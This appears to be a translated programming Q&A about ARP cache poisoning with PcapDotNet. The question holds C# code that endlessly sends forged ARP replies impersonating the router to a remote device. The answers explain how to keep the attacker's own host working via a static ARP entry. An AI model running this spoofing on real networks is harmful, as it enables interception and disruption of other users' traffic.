1

我正在使用 PcapDotNet 使用以下代码创建 ARP 毒包:

using (PacketCommunicator communicator =
            selectedDevice.Open(100, PacketDeviceOpenAttributes.Promiscuous, 1000)) 
        {
            while (true)
            {
                Packet arp;

                EthernetLayer ethernetLayer = new EthernetLayer
                {
                    Source = new MacAddress("f8:d1:11:05:8c:91"), // My Mac
                    Destination = new MacAddress("5c:da:d4:29:6d:5f"), // Remote device IP
                    EtherType = EthernetType.None, // Will be filled automatically.
                };

                ArpLayer arpLayer = new ArpLayer
                {
                    ProtocolType = EthernetType.IpV4,
                    Operation = ArpOperation.Reply,
                    SenderHardwareAddress = new byte[] { 0xf8, 0xd1, 0x11, 0x05, 0x8c, 0x91 }.AsReadOnly(), // My MAC
                    SenderProtocolAddress = new byte[] { 192, 168, 1, 254 }.AsReadOnly(), // My Router IP

                    TargetHardwareAddress = new byte[] { 0xff, 0xff, 0xff, 0xff, 0xff, 0xff }.AsReadOnly(),
                    TargetProtocolAddress = new byte[] { 0, 0, 0, 0 }.AsReadOnly(),
                };

                PacketBuilder builder = new PacketBuilder(ethernetLayer, arpLayer);

                arp = builder.Build(DateTime.Now);

                communicator.SendPacket(arp);
                System.Threading.Thread.Sleep(500);
            }
        }

问题是:我可以毒害远程设备,但我的电脑也失去了互联网(毒害自己?)。我想也许问题是我必须(以某种方式)表明我希望我自己的系统不读取我发送的数据包......但我不知道如何......有人可以解释一下这里有什么问题吗?

4

2 回答 2

2

将包含网关 IP 的 ARP 条目标记为静态(使用正确的硬件地址)。为此,请以管理员身份在 cmd 中执行以下命令:

netsh interface ip add neighbors "{Network Device}" {IP Address} {MAC Address}

网络设备是例如“本地连接”“以太网”(不要忘记引号)。要查找您当前使用的网络设备,请执行命令“ ncpa.cpl ”。

如果要删除静态条目,请在cmd中执行以下命令:

netsh interface ip delete neighbors "{Network Device}" {IP Address}

另外,请记住,您没有互联网的原因之一是因为网络中的所有流量都被重定向到您的主机。由于您的主机没有与路由器相同的功能,因此可能会出现网络拥塞。为了确定你不能上网的原因是你自己中毒了,在cmd中执行命令“ arp -a ”并检查路由器的硬件地址。如果硬件地址与您主机的硬件地址相同,那么您就是在毒害自己。

于 2013-09-20T19:57:19.447 回答
0

您是否有可能为您的路由器内部 IP 创建毒记录?如果是这样,那么您的互联网连接停止工作也就不足为奇了,因为您的操作系统将不再能够将任何内容发送到您的路由器,因此也无法发送到互联网。

于 2013-03-17T20:54:47.800 回答